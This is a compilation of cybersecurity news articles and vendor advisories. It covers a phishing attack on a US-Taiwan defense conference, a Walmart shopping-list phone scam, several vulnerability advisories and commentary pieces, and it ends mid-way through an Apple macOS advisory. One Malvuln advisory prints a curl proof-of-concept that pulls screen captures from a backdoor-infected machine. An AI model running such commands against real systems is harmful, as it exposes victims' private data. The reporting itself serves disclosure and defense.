Hackers sent a convincing lure document, but after 20 years of similar attacks, the target organization was well prepared.

Source: elifbayraktar via Alamy Stock Photo

A meeting of influential figures in and around the US and Taiwanese defense industries has been targeted by a phishing attack carrying fileless malware.

The 23rd US-Taiwan Defense Industry Conference will be held next week in Philadelphia's Logan Square neighborhood. Closed to the press, it will feature speakers from government, defense, academia, and commercial sectors in the US and Taiwan. The focus, according to its website, will be "addressing the future of US defense cooperation with Taiwan, the defense procurement process, and Taiwan's defense and national security needs."

Recently, the US-Taiwan Business Council — the organization behind the event — was sent a malicious forgery of its own registration form. The form was paired with information-stealing malware designed to execute entirely in memory, making it more difficult to detect with traditional antivirus software. Thanks to diligent anti-phishing preparations, however, the council quickly rebuffed the attack.

**Threats to a Taiwan Defense Conference**

Eight years ago, a Chinese phishing email was sent to members of Taiwan's defense industry, including some attendees of the 15th US-Taiwan Defense Industry Conference. Even by then, though, it was old hat.

"In the period from 2003 to 2011, we were heavily targeted with spear-phishing emails constantly," reports Lotta Danielsson, vice president of the US-Taiwan Business Council. "There was an uptick in 2016-2017, but it has been very quiet for the last several years. Usually, it increases in the leadup to and right after the annual defense conference, then it subsides again."

In the leadup to this year's conference, rather than attendees, the attack seemed to target the council itself. It came in an email, from an individual posing as a potential attendee. Rather than use the event's online form, the impersonator sent a filled out copy of the registration form as a PDF, which attendees can do if they experience technical issues with the site.

Source: Cyble

The document, according to analysis from Cyble, came with a ZIP file that was supposed to drop a malicious Windows shortcut (LNK) file. If opened, the LNK would have established persistence on its targeted machine by placing an executable file in the Windows startup folder. Upon reboot, the executable would download additional payloads to be executed directly in the machine's memory, without saving any files to disk. Ultimately, the malware could exfiltrate data back to an attacker-controlled server through Web requests designed to blend with normal network traffic.

Cyble researchers were unable to tie the attack to any specific threat actor. They noted, however, that Chinese entities in particular have a long history of targeting Taiwan.

"We've seen very clearly in the last few years that there are a lot of problems in East Asian geopolitics — military-related movements in the South China Sea, very sharp comments coming from Taiwan and China. And it looks like nation states are interested in US-Taiwan defense cooperation," says Kaustubh Medhe, head of research and intelligence for Cyble.

This latest phishing attempt fits neatly into that picture. "We have a strong suspicion that this could be used as a stealthy technique to perform long-term surveillance of people with a specific interest in this particular topic," he says.

**A Textbook Case of How to Prevent Phishing**

As Danielsson recalls, "We have been targeted by these types of spear phishing emails for a long time — more than 20 years — so we flagged it as suspicious right away. We did not open the file. Instead, we submitted it to VirusTotal and confirmed that it was malicious. Then we deleted it, and that was pretty much it."

She highlights a few keys to success that have helped the Council easily swat away its many phishing attacks over the years. "One is educational, so the entire staff is well educated on these types of attacks. Nobody clicks links in emails, or opens documents sent via email, unless we have talked to people directly and are expecting them. Even then, we often scan them before opening, unless the presumed content is very sensitive, in which case we will call people to double-check that they sent them," she says.

Besides that, she adds, "We keep our email clients text-only so it's easy to see any obfuscation of links right away. I log all traffic in and out of our system and keep an eye out for anomalies. We also take our entire system offline at night and on weekends, air-gapping our computers and internal IT systems. This is doable because we are a small office with three people, something that might be harder for a larger organization. I also have some relationships with people who work in the cybersecurity industry, and they have helped us think through what to do if we do end up failing to prevent an issue. We want to be prepared if it does."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Phishing Espionage Attack Targets US-Taiwan Defense Conference

Scammers are creating fake Walmart virtual shopping lists that look like a contact page for customer service.

Shopping online or attempting to get in touch with a store is a little bit like walking on a minefield: you might get lucky or take a wrong step and get scammed.

Case in point, a malicious ad campaign is abusing Walmart Lists, a kind of virtual shopping list customers can share with family and friends, by embedding rogue customer service phone numbers with the appearance and branding of the official Walmart site.

The scam ends in accusations of money laundering, threats of arrest warrant, and pressure to transfer money into a Bitcoin wallet.

In this blog, we walk through the different parts of this well executed scheme and provide helpful tips to avoid falling for this scam. We have already reported the malicious Google ads and informed Walmart of the abuse of its customer’s shopping lists.

**Malicious Google ads**

When searching for Walmart’s phone number, the top result on Google is for an ad (sponsored). Unless you manually checked “My Ad Center”, you would have no idea who the ad belongs to.

More importantly, because the ad snippet shows the _https://www.walmart.com_ address, you might wrongly assume that it is a genuine advert from Walmart.

Figure 1: A Google search for Walmart’s phone number on a mobile device

Figure 2: A Google search for Walmart’s phone number on a desktop computer

In previous cases, we have seen malicious advertisers impersonate brands by displaying their official website in the ad URL. However, this is a little bit different as the ad’s final URL actually belongs to Walmart.

On mobile, due to space limitations in the address bar, users will see _walmart.com_, while on desktop they will see the full URL. In both instances, this is a strong indicator of legitimacy, one which people have been trained to check for years. This is not an impostor website, it is the real one, so one might think that whatever is shown on the page must also be legitimate.

Figure 3: A fake Walmart shopping list as seen on a phone

Figure 4: A fake Walmart shopping list as seen from a desktop computer

Lists is a feature that registered Walmart customers can use to add items they might be interested in purchasing. To create a list, you first need to register for an account, but it is free and does not require any form of authentication or payment method.

The scammers have created several accounts and fake lists where they can instead add custom text. Their goal is to trick people thinking this is a contact page for Walmart customer service. This is exactly what they do by using fake names like “Mr Walmart S.” and entering their own phone number in the page.

Finally, they can use a link to share this list with others, and this is the link they will use for the Google ads. As such, the ad actually does not violate Google’s policy per se since the branded ad does go to the brand’s website. But, as we know, this is all fake.

**What happens next?**

People who dial any of those supposed customer service phone numbers shown on the Walmart lists will be directed to a call center in Asia. On the other end of the line scammers impersonating Walmart will get their information (name, email address) before reviewing their details.

As it happens, victims will be told that a large purchase was recently made on their account. That’s the scare tactic that will allow scammers to request more personal information related to their banking, and even social security number.

The call centre uses several different people, all who play a different role to process victims:

*   the Walmart customer service representative
*   the higher authority or “supervisor”
*   a fake bank employee
*   a fake FTC investigator

When we called, the scammers claimed that our account had been used to transfer huge amounts of money to narco trafficking countries:

_Now, all the banking found which was created using your personal information are transferring huge amounts of money to the narco trafficking countries such as Columbia, Mexico, some Saudi Arabia countries and Columbia._

As a result, we were told that there was an active arrest warrant against us:

_Otherwise we have to take you under the custody for \[inaudible\] purpose, because there is an active arrest warrant also available on your name._

We were threatened several times and warned to go to our bank to withdraw as much money as the bank would allow in order to transferring those funds into a Bitcoin wallet. Oddly enough, the scammer mentions there won’t be any taxes on the transaction, which really would be the last concern on someone’s about to be arrested:

_Yes, I know Sir, it’s not a checking account, it’s a Bitcoin wallet. The machines are… is installed by the \[inaudible\] for the anti money laundering charges. So you don’t, like, get any taxes on it as well as, the transactions done are anti money laundering. So you have to create your own wallet on that machine. How you can create it using your personal information, I will guide you step by step. I will be on the line with you all the time, you don’t need to worry about that. OK?_

It’s quite scary to see how anyone can go from wanting to return an item or speak to a Walmart associate, to being falsely accused of crimes and pressured to transfer money. It’s also a reality check that scammers are constantly preying on the vulnerability of innocent people.

**How to avoid falling for scams**

In a fast paced world where technology can be abused, it is important to keep certain things in mind.

*   Sponsored results, or ads can be dangerous due to ongoing and relentless malvertising campaigns. Learn to spot a regular search result from an ad, and if possible avoid clicking on ads.
*   Even if you are on an official website, the content you see may not be legitimate. This is a particularly hard one because people will naturally trust that the brand’s own site will be safe. But scammers and spammers can inject content in comments, or custom pages.
*   Scare tactics and pressure to act quickly are almost always malicious. Unfortunately, most brands also have these promotions that expire soon and customers believe they need to buy the product now or they will lose on a deal. Having said that, your local store will never threaten you on the phone with an arrest warrant.
*   Scammers will often tell their victims to keep everything confidential and not discuss it with other family members or bank clerks. This is only in the scammers’ interest to not be exposed; by all means you should ask for clarification and seek help from others.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Walmart customers scammed via fake shopping lists, threatened with arrest 

An arbitrary code execution vulnerability exists in versions 0.2.9 up to 0.5.10 of the Guardrails AI Guardrails framework because of the way it validates XML files. If a victim user loads a maliciously crafted XML file containing Python code, the code will be passed to an eval function, causing it to execute on the user's machine.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-w392-75q8-vr67: Guardrails has an arbitrary code execution vulnerability

Ubuntu Security Notice 7019-1 - Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could possibly trigger this vulnerability to cause a denial of service. Gui-Dong Han discovered that the software RAID driver in the Linux kernel contained a race condition, leading to an integer overflow vulnerability. A privileged attacker could possibly use this to cause a denial of service.

Ubuntu Security Notice USN-7019-1

Backdoor.Win32.Delf.yj malware suffers from an information leakage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f991c25f1f601cc8d14dca4737415238.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Delf.yjVulnerability: Information DisclosureDescription: The malware listens on TCP port 8080. Third-party adversaries who can reach an infected system, can  download screen captures of a victims machine by making a simple HTTP GET request.Family: DelfType: PE32MD5: f991c25f1f601cc8d14dca4737415238SHA256: 512af3cc193e9cb7f0b6204889bc457affded79aa62c41ab20a74625e4279caaVuln ID: MVID-2024-0693Dropped files: dxdiag.scrDisclosure: 09/17/2024Exploit/PoC:curl 192.168.18.125:8080  --output victim.jpg  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  106k  100  106k    0     0   338k      0 --:--:-- --:--:-- --:--:--  341kDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Delf.yj MVID-2024-0693 Information Disclosure

Ultimately, the goal of businesses and cyber insurers alike is to build more resilient IT environments to avoid cyberattacks and the ransom, downtime, and reputation hit that come along with them.

Source: Olekcii Mach via Alamy Stock Photo

COMMENTARY

The rising cost of cyberattacks, including downtime, investigations, lawsuits, ransoms, and more are prompting cyber insurers to re-examine underwriting and encourage greater cyber resiliency in their customer bases. With the influx of cyber-insurance claims stemming from the CrowdStrike IT outage and the exorbitant price of recovering from data breaches — $4.88 million, on average, according to IBM — the cyber-insurance industry will continue to self-correct and evolve to fit market needs while maintaining profitability.

Insurers will come away from July's widespread IT outage relatively unscathed, as the outages were caused by a vendor error, not a cyberattack, and because it was fixed fairly quickly. Still, insurer Parametrix estimates insured losses from US Fortune 500 companies will total $540 million to $1.08 billion, not even including Microsoft. Now, imagine this is a cyberattack that goes through a third-party software-as-a-service (SaaS) provider and takes down a similar swath of business, but recovery is slower, and companies must pay ransoms to recoup their data. How many billions of dollars will cyber insurers be out then? 

Because cybersecurity is still a relatively new corner of the insurance market, ambiguity remains around what should be covered, the role cyber insurance plays in potentially encouraging ransom payments, etc. There's no doubt that it's still finding its footing, figuring out in real-time and on a world stage how to insure companies against rapidly changing and advancing cybersecurity threats.

This evolution will be what finally causes businesses to face reality and prioritize cyber resiliency to ensure data is always recoverable in the event their primary network is taken offline or data is held for ransom. Companies may not take it upon themselves to invest in better data protection practices, and the cyber-insurance market ultimately will force their hand.

**Cyber Insurers Drag Us Into the Future**

Over the past five years, the rise of ransomware has shifted not only an organization's risk profile but also the estimated payouts. In many insurance policies, it's all about risk mitigation, but unless an underwriter can accurately assess the risk or implement requirements to mitigate the threat, it becomes a financial business risk for the insurance company. Therefore, cyber-insurance prices have significantly risen along with the bar to qualify for coverage.

Many of the new requirements focus on data storage and backups. Segmented, encrypted, and immutable backups are the industry standard, but because of limited resources, unawareness, or segmented cybersecurity teams, it hasn't always been a prioritized industry standard. Now, companies will have no choice but to up their game if they want coverage. Those who fail to adopt these requirements will be left without insurance or an effective recovery plan, unable to financially recover when the inevitable ransomware attack hits.

However, in June, businesses stood before the House Homeland Security Committee and told Congress that they are struggling to obtain cyber insurance, and even once insurance is secured, they struggle to understand the nuances of what's covered. Plus, ransom payments themselves are increasing as cybercriminals learn they can demand, and receive, large payouts. According to Chainalysis, the median ransom payment in 2024 was $1.5 million as of July, a huge increase from $200,000 in early 2023.

Because such a significant portion of companies are uncertain what is actually covered by their cyber insurance — around 40%, according to Sophos — they can't risk having to pay the whole ransom themselves or face never recovering their valuable data. Companies must do what they can to reduce their own risk.

**Recoverable Data Is Its Own Form of Cyber Insurance**

Companies can reduce the cost of attacks by ensuring data remains recoverable, mitigating operational downtime, and preventing the need to pay ransoms. Ransomware relies on the fact that production or backup data is made useless for organizations to recover following an attack, but with immutable backup in place, organizations ensure access to their data remains. This is especially true as ransomware is now targeting backups specifically.

Immutability is a must-have for any type of backup storage because it is time-based, not key-based like encryption. This means that there is truly no way (outside of destruction of the physical hardware) to alter or remove the backup data once it is written into a device that has object lock, i.e., immutability, enabled. You can truly maximize this strategy by encrypting backup data before writing it to immutable storage; that way, it's unreadable (unless you have the key) and unalterable. 

It's also important to ensure that a disaster recovery plan is in place that includes a multilevel backup solution and disaster recovery testing on a weekly and monthly basis to get ahead of any potential issues. Once these are implemented, keep copies of all the backup tests to prove to an insurance company that you have a lower risk factor. 

Ultimately, the goal of businesses and cyber insurers alike is to build more-resilient IT environments to avoid cyberattacks and the ransom, downtime, and reputation hit that come along with them. Law enforcement will continue to fight cybercrime, but there's no indication it will let up. Changes in the cyber-insurance market have the potential to disrupt the threat landscape by prompting the ubiquitous adoption of backup best practices and cyber resiliency.

**About the Author**

CEO, Object First

Object First CEO, David Bennett is a tech veteran and a seasoned channel executive with more than 30 years of IT channel leadership. Before joining Object First, he was CEO of Axcient and chief revenue officer at Webroot. Bennett has also held international leadership roles within such companies as Lenovo, Sony, and Kingston. British-born, he now resides in Colorado with his wife and family.

How Shifts in Cyber Insurance Are Affecting the Security Landscape

The evolution of software always catches us by surprise. I remember betting against the IBM computer Deep Blue during its chess match against the grandmaster Garry Kasparov in 1997, only to be stunned when the machine claimed victory. Fast forward to today, would we have imagined just three years ago that a chatbot could write essays, handle customer support calls, and even craft commercial

Penetration Testing / Automation

The evolution of software always catches us by surprise. I remember betting against the IBM computer Deep Blue during its chess match against the grandmaster Garry Kasparov in 1997, only to be stunned when the machine claimed victory. Fast forward to today, would we have imagined just three years ago that a chatbot could write essays, handle customer support calls, and even craft commercial artwork? We continue to be amazed by what software can achieve—tasks we once thought were strictly human domains. Such is the surprise unfolding in the sphere of cybersecurity testing. Hold tight!

****Demystifying Penetration Testing****

If someone had told me 10 years ago that computer software could one day perform the work of an ethical hacker, I would have said 'No way, Jose'. Penetration testing—PT for short—is when experts mimic hackers to test a company's defenses. It's a critical practice, mandated by major regulatory bodies like PCI DSS, HIPAA, and DORA to ensure network safety. Yet, despite its critical role, PT has been conducted in much the same way for decades.

****We've Been Used to Paying the Bill****

Traditional PT doesn't come cheap, ranging from $30,000 for basic external web tests to $150,000 for complex cloud systems analyses. The process is lengthy, too often taking two to three months from the initial service request to final reporting, and only covering 5% to 10% of an organization's assets at each pass.

Now consider the new economics: for the price of a single manual pentesting exercise one can perform automated daily exercises with ten times the scope in each run throughout the year. The financial argument for automation is truly disruptive. With software the cost per test run turns from the price of a BMW M4 to the price of a pair of Air Jordan sneakers. It's that drastic.

****The Brief History of Security Validation****

While the broader cybersecurity field has seen rapid advancements, such as AI-driven endpoint security, PT has been slow to evolve. Pentera led the charge by introducing automated security testing capabilities back in 2015. That was the birth of algorithm-based security validation solutions. Its commercial debut was met with enthusiasm from a few early adopters and skepticism from many traditionalists. Nearly a decade later, Pentera, and several others, have expanded the envelope to fully automated infrastructure and application penetration testing with thousands of raving enterprise security professionals using the software daily.

****Embracing Automated Solutions****

The shift toward automation is gaining momentum, and the benefits of frequent and thorough testing are evident. While there's still a place for the expert work of a master pentester for application testing, physical-cyber attack paths, and other advanced and bespoke scenarios, the need for broad coverage and frequent checks is clear. When it comes to addressing the world's hundreds of millions of untested systems, software-based solutions offer unmatched efficiency and affordability. As cybersecurity challenges continue to grow, investing in automated PT isn't just a smart move—it's essential for maintaining robust security defenses without breaking the bank.

The Future of Cybersecurity Testing - is in Software. So, I ask: why pay a pentester?

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Why Pay A Pentester?

A researcher bypassed the Calendar sandbox, Gatekeeper, and TCC in a chain attack that allowed for wanton theft of iCloud photos.

Source: Bjanka Kadic via Alamy Stock Photo

A zero-click chain of critical-, medium-, and low-severity vulnerabilities in macOS could have allowed attackers to undermine macOS's brand name security protections and ultimately compromise victims' iCloud data.

The story begins with a lack of sanitization of files attached to Calendar events. From there, researcher Mikko Kenttälä discovered he could achieve remote code execution (RCE) on targeted systems, and access sensitive data — in his experiments, he used iCloud Photos. No step in the process required any user interaction, and neither Apple's Gatekeeper nor Transparency, Consent, and Control (TCC) protections could stop it.

**Zero-Click Exploit Chain in macOS**

The all-important first bug in the chain — CVE-2022-46723 — was awarded a "critical" 9.8 out of 10 CVSS score back in February 2023.

It wasn't just dangerous, it was simple to exploit. An attacker could simply send the victim a calendar invite containing a malicious file. Because macOS failed to properly vet the filename, the attacker could name it arbitrarily, to variously interesting effect.

For example, they could name it with the goal of deleting a specific, preexisting system file. If they gave it the same name as an existing file, then deleted the calendar event through which they delivered it, the system would delete both the malicious file and the original file it mimicked, for whatever reason.

More dangerous was the potential for an attacker to perform path traversal, naming their attachment in such a way that would allow it to escape the Calendar's sandbox, where attached files are supposed to be saved, to other locations on the system.

Kenttälä used this arbitrary file write power to take advantage of an operating system upgrade (at the time of discovery, macOS Ventura was about to be released). First, he created a file mimicking a Siri-suggested repeating calendar event, hiding alerts that would trigger the execution of further files during a migration. One of those follow-on files was responsible for migrating old calendar data to the new system. Another allowed him to mount a network share from Samba, the open source Server Message Block (SMB) protocol, without triggering a security flag. Another two files triggered the launch of a malicious app.

**Undermining Apple's Native Security Controls**

The malicious app snuck in without raising any alarm, thanks to a bypass in macOS's Gatekeeper security feature — the thing standing in the way of Mac systems and untrusted apps. Labeled CVE-2023-40344, it was assigned a medium-severity 5.5 out of 10 CVSS rating back in January 2024.

Gatekeeper, though, wasn't the only signature macOS security feature undermined in the attack. Using a script launched by the malicious app, Kenttälä successfully replaced the configuration file associated with iCloud Photos with a malicious one. This re-pointed Photos to a custom path, outside of the protection of TCC, the protocol macOS uses to ensure apps don't improperly access sensitive data and resources. The re-pointing, CVE-2023-40434 — with a "low" 3.3 CVSS severity score — opened the door to wanton theft of photos, which could be exfiltrated to foreign servers with "trivial modifications."

"MacOS's Gatekeeper and TCC are critical for ensuring only trusted software is installed and managing access to sensitive data," explains Callie Guenther, senior manager of cyber threat research for Critical Start. "However, the zero-click vulnerability in macOS Calendar showed how attackers can bypass these protections by exploiting sandbox processes." Guenther notes, though, that macOS isn't uniquely vulnerable to these types of attacks: "Similar vulnerabilities exist in Windows, where Device Guard and SmartScreen can be bypassed using techniques like privilege escalation or exploiting kernel vulnerabilities."

For example, she adds, "Attackers have used DLL hijacking or sandbox escape methods to defeat Windows security controls. Both operating systems rely on robust security frameworks, but persistent adversaries — especially APT groups — find ways to bypass these defenses."

Apple acknowledged and patched the many vulnerabilities in the exploit chain at various points between October 2022 and September 2023.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Zero-Click RCE Bug in macOS Calendar Exposes iCloud Data

US State Department warns that Kremlin-backed media outlets in democracies around the world are hiding Russian cyber spies and actively working to sow discord.

Source: Postmodern Studio via Alamy Stock Photo

Long understood as a Kremlin-backed propaganda machine, RT News, based in the US, has been far more nefarious than officials once believed.

Just last week, the Biden administration charged two Russian nationals with pumping $10 million into RT International, a media company the US said was used by the Russian government to meddle in the upcoming US elections.

But these robust Russian interference and disinformation operations aren't unique to the US. In fact they're in full swing around the world, according to a new warning from US Secretary of State Antony Blinken.

Blinken explained in Sept. 13 statements that the US has recently discovered RT included an embedded Russian cyber unit, operating since the spring of 2023 with the full knowledge of RT leadership, adding the news outlet was "functioning like a de facto arm of Russia's intelligence apparatus."

The RT leadership team is also accused by the US of running a large crowdfunding campaign to procure equipment like weapons and generators for Russian soldiers fighting against Ukraine.

Details about RT's espionage participation and equipment fundraising were provided by RT employees, Blinken added.

**RT Tactics Replicated Around the World**

Blinken warned a similar Kremlin strategy is being used to spread disinformation and undermine democracies around the world, most acutely in Africa, Germany, and Moldova.

RT and similar influence outlets, like German outlet Red (formerly Redfish), feed intelligence gathered not just to the Russian government but media outlets and mercenary groups as well, Blinken said. Across Africa, a social media-based news organization called African Stream is being used by the Kremlin to spread disinformation in a similar fashion, he added.

"We urge every ally, every partner, to start by treating RT's activities as they do other intelligence activities by Russia within their borders," Blinken said. "Our most powerful antidote to Russia's lies is the truth."

RT News Hosted Russian Cyber Spy Unit, US Says

Apple Security Advisory 09-16-2024-10 - macOS Ventura 13.7 addresses buffer overflow, bypass, out of bounds access, out of bounds read, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-16-2024-10 macOS Ventura 13.7

macOS Ventura 13.7 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121234.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Accounts  
Available for: macOS Ventura  
Impact: An app may be able to leak sensitive user information  
Description: The issue was addressed with improved checks.  
CVE-2024-44129

App Intents  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive data logged when a  
shortcut fails to launch another app  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44182: Kirin (@Pwnrin)

AppKit  
Available for: macOS Ventura  
Impact: An unprivileged app may be able to log keystrokes in other apps  
including those using secure input mode  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-27886: Stephan Casas, an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with additional code-signing  
restrictions.  
CVE-2024-40847: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: A downgrade issue was addressed with additional code-  
signing restrictions.  
CVE-2024-40814: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed with improved checks.  
CVE-2024-44164: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A library injection issue was addressed with additional  
restrictions.  
CVE-2024-44168: Claudio Bozzato and Francesco Benvenuto of Cisco Talos

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An attacker may be able to read sensitive information  
Description: A downgrade issue was addressed with additional code-  
signing restrictions.  
CVE-2024-40848: Mickey Jin (@patch1t)

Automator  
Available for: macOS Ventura  
Impact: An Automator Quick Action workflow may be able to bypass  
Gatekeeper  
Description: This issue was addressed by adding an additional prompt for  
user consent.  
CVE-2024-44128: Anton Boegler

bless  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44151: Mickey Jin (@patch1t)

Compression  
Available for: macOS Ventura  
Impact: Unpacking a maliciously crafted archive may allow an attacker to  
write arbitrary files  
Description: A race condition was addressed with improved locking.  
CVE-2024-27876: Snoolie Keffaber (@0xilis)

Dock  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed by removing sensitive data.  
CVE-2024-44177: an anonymous researcher

Game Center  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A file access issue was addressed with improved input  
validation.  
CVE-2024-40850: Denis Tokarev (@illusionofcha0s)

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may lead to a denial-of-service  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44176: dw0r of ZeroPointer Lab working with Trend Micro Zero  
Day Initiative, an anonymous researcher

Intel Graphics Driver  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted texture may lead to unexpected  
app termination  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-44160: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Intel Graphics Driver  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted texture may lead to unexpected  
app termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44161: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

IOSurfaceAccelerator  
Available for: macOS Ventura  
Impact: An app may be able to cause unexpected system termination  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44169: Antonio Zekić

Kernel  
Available for: macOS Ventura  
Impact: Network traffic may leak outside a VPN tunnel  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44165: Andrew Lytvynov

Mail Accounts  
Available for: macOS Ventura  
Impact: An app may be able to access information about a user's contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-40791: Rodolphe BRUNETTI (@eisw0lf)

Maps  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-44181: Kirin(@Pwnrin) and LFY(@secsys) from Fudan University

mDNSResponder  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service  
Description: A logic error was addressed with improved error handling.  
CVE-2024-44183: Olivier Levon

Notes  
Available for: macOS Ventura  
Impact: An app may be able to overwrite arbitrary files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44167: ajajfxhj

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44178: Mickey Jin (@patch1t)

Safari  
Available for: macOS Ventura  
Impact: Visiting a malicious website may lead to user interface spoofing  
Description: This issue was addressed through improved state management.  
CVE-2024-40797: Rifa'i Rejal Maynando

Sandbox  
Available for: macOS Ventura  
